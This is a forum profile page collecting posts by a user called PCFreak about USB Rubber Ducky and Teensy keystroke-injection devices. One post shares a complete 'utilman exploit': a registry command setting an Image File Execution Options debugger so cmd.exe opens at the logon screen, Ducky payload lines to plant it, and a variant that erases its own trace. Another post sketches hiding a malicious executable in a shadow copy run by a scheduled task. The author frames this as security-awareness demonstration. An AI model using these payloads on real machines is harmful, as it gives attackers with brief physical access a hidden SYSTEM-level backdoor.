Jump to content

PCFreak

Active Members
  • Posts

    25
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by PCFreak

  1. What script do you mean? The vssown.vbs? It should work on a Win7 Box without any problems (administrative shell required). Cheers PCFreak
  2. Try to use this Java RDP client. Successfully added it to my Adito installation and it works with Win7 and Server 2008. Also take a look at this one.
  3. I have a Teensy 2.0. It is enough for just emulating a HID device. It costs 16$ and does it exactly what it should. Btw. you can do much more with it, since it also many I/O ports on it. The difference between the Teensy and the ducky is, that the ducky is smaller and that the payload comes from the SD-Card. On the teensy you have to plugin the Teensy to program and the payload is stored in the RAM on the Teensy. You have about 32K available. A normal payload takes about 4k. I recommend you read this page http://www .irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle and use Irongeeks "phukd" library to make it easier for you. It depends on you. If you understand a little bit about programming, then the Teensy is a good choice. If the Ducky would be perfect (Firmware + Encoder) it's price would be okay. At the moment it is too expensive, since the software for the ducky is not very well programmed. If you have further questions just send me a PM. Cheers PCFreak
  4. As a user you only can write to "your" part of the registry which is "HKCU" (HKEY_CURRENT_USER). To be able to write to "HKLM" (HKEY_LOCAL_MACHINE) you need administrative rights. The original Utilman exploit also needs administrative rights or needs to be applied from an external booted operating system, since it changes files in Windows\system32 directory. The utilman exploit is not a "privilege escalation" exploit. If you have physical access to a machine (which you of course need to plugin the Ducky) you can always get access. The only way to avoid this is to always lock your machine when leaving it and fully encrypt your hard drive. Concerning your work place computer. Maybe your administrator did the right thing and did not gave you administrative rights or you just did not start regedit or whatever program you use to edit the registry with administrative rights? I use the utilman exploit with the registry key only for the purpose to show our employees how dangerous it is not to lock your machine. Cheers PCFreak
  5. I played a little bit with it. For Rubberducky payloads it makes not that much sense, since we do everything by keyboard and if we create an evil executable on the target system just by keyboard inputs we do not need to hide it, we want to execute it right now! It might be interesting if you want to place the executable on the target system and then run it via a Scheduled task that you also setup with the ducky. I think about the following 1. Create executable via base64 encoding through VBScript in the windows\system32 folder 2. Place vssown.vbs on target system 2. Create a shadow copy 3. Delete your executable 4. Setup a scheduled task that calls vssown.vbs /execute \Windows\system32\evil.exe The only advantage of this procedure would be that evil.exe is not visible for nearly 99% of users since no one would mount a Shadow Copy. My opinion: Good idea but not so practical for the Ducky. Maybe if we could access the ducky's flash somehow it might be interesting in the future. Cheers Peter
  6. The original utilman exploit is usually used to reset the password on Windows 7 machines by booting a Linux Live CD and copy utilman.exe to utilman.bak copy cmd.exe to utilman.exe and then reboot. When pressing the EoA button you can reset the password in the opening system shell. The goal of my payload was to show our employees in the "IT Security and Safety Training" what an attacker can do if it has 30 seconds access to an unlocked Windows 7 machine. Believe me, showing them something is better than just telling them! And the USBRubberDucky is the ideal device to do so! But the technique with the registry key could also be used for the password recovery purpose. Instead of making modifications to utilman.exe it would be easier just to offline edit the registry to do the same. The nice thing about the Registry method is, that you could auto-delete the key on execution and the system works as it did before. I am currently thinking about writing a small programm for a Live-Windows-PE-CD and/or Linux that does exactly that. My idea is, that you just execute ResetPass [path to Software hive] [username] [new password] So just calling (Linux) ResetPass '/mnt/C/Windows/System32/config/software' "pcfreak" "changeme" (Windows) ResetPass.exe 'X:\Windows\System32\config\software' "pcfreak" "changeme" would place the correct command into the registry that needs to get executed to reset the password for user "pcfreak" to "changeme". After booting the system and pressing the EoA button you can login with the new password. When I have the time to code this and it is working I will sure let you know. Cheers PCFreak
  7. It runs as system as utilman would. The system executes the debugger (which is now cmd.exe) as it would execute utilman! The replacement (debugger) runs in the same context as the executable would ran originally. Just try it out. Cheers PCFreak
  8. Hi, I recently created a very nice utilman exploit, that I like to share with you. The difference to all other methods currently used with the ducky is, that my version does not need to change any system file. I just set a registry key and all is done. I will explain in detail here how it works. The current available utilman exploits using the Ducky change the user rights of utilman.exe, so that it can be backed up and replaced with cmd.exe. This is a huge change to the system and it leaves a lot of traces. <_< As described in this Microsoft Article about "Launching the debugger automatically", Reading further in this article, you learn how to setup the system, that instead of the "real program" the debugger is executed. So let's apply that to the utilman exploit. We just need to tell the system to execute CMD.EXE instead of UTILMAN.EXE to be able to logon to the system just by clicking the "Ease of Access"-button at the logon screen. Nothing is easier than that, just use this command (as an administrative user): REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /d cmd.exe /f That's all - Try it out! So one could now combine the already available payload for an administrative command prompt on Windows 7 GUI DELAY 50 STRING cmd MENU STRING a ENTER LEFT ENTER DELAY 200 with this STRING REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /d cmd.exe /f ENTER STRING EXIT ENTER and has now the ability to login to this system whenever he wants to just by clicking the "Ease of Access"-button at the logon screen. You could go one step further by using this code to add the registry key: STRING REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /d "cmd.exe /c start """Utilman Exploit by PCFreak""" cmd.exe /s /k REG DELETE """HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe""" /f &amp;&amp; @echo Enjoy!" /f ENTER STRING EXIT ENTER This does the same, but when using utilman.exe (Press EoA-button on lock screen) the opening command shell automatically removes its tracks from the registry and stays open, so after using the exploit it is not trackable any more. Currently I cannot try this myself with the USB Rubberducky, since I have a german keyboard and with the ducky it is still not possible to switch keyboard layouts but the above code should work. I have a working code and a demonstration video how it works on my blog (blog.pcfreak.de) Here is the source code for the Teensy 2.0 board. http://blog.pcfreak.de/wp-content/upload/most_sophisticated_utilman_exploit.zip I hope you find this sophisticated method interesting and have fun with it. ;) Cheers PCFreak
  9. Its January 17th 2012 now - just for information!
×
×
  • Create New...